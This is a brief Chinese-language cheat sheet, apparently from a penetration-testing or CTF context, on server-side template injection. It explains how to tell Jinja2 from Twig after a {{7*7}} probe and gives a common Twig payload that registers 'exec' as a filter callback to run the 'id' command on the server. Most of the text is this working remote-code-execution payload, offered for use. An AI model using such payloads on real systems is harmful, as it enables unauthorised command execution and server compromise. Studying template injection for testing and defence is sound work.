判断完{{7*7}}后还要判断是jinjia2模板还是twig模板
直接看响应包是python(jinjia2)还是php(twig)
twig模板常用payload:
{{_self.env.registerUndefinedFilterCallback(“exec”)}}{{_self.env.getFilter(“id”)}}
{{_self.env.registerUndefinedFilterCallback(“exec”)}}
{{_self.env.getFilter(“id”)}}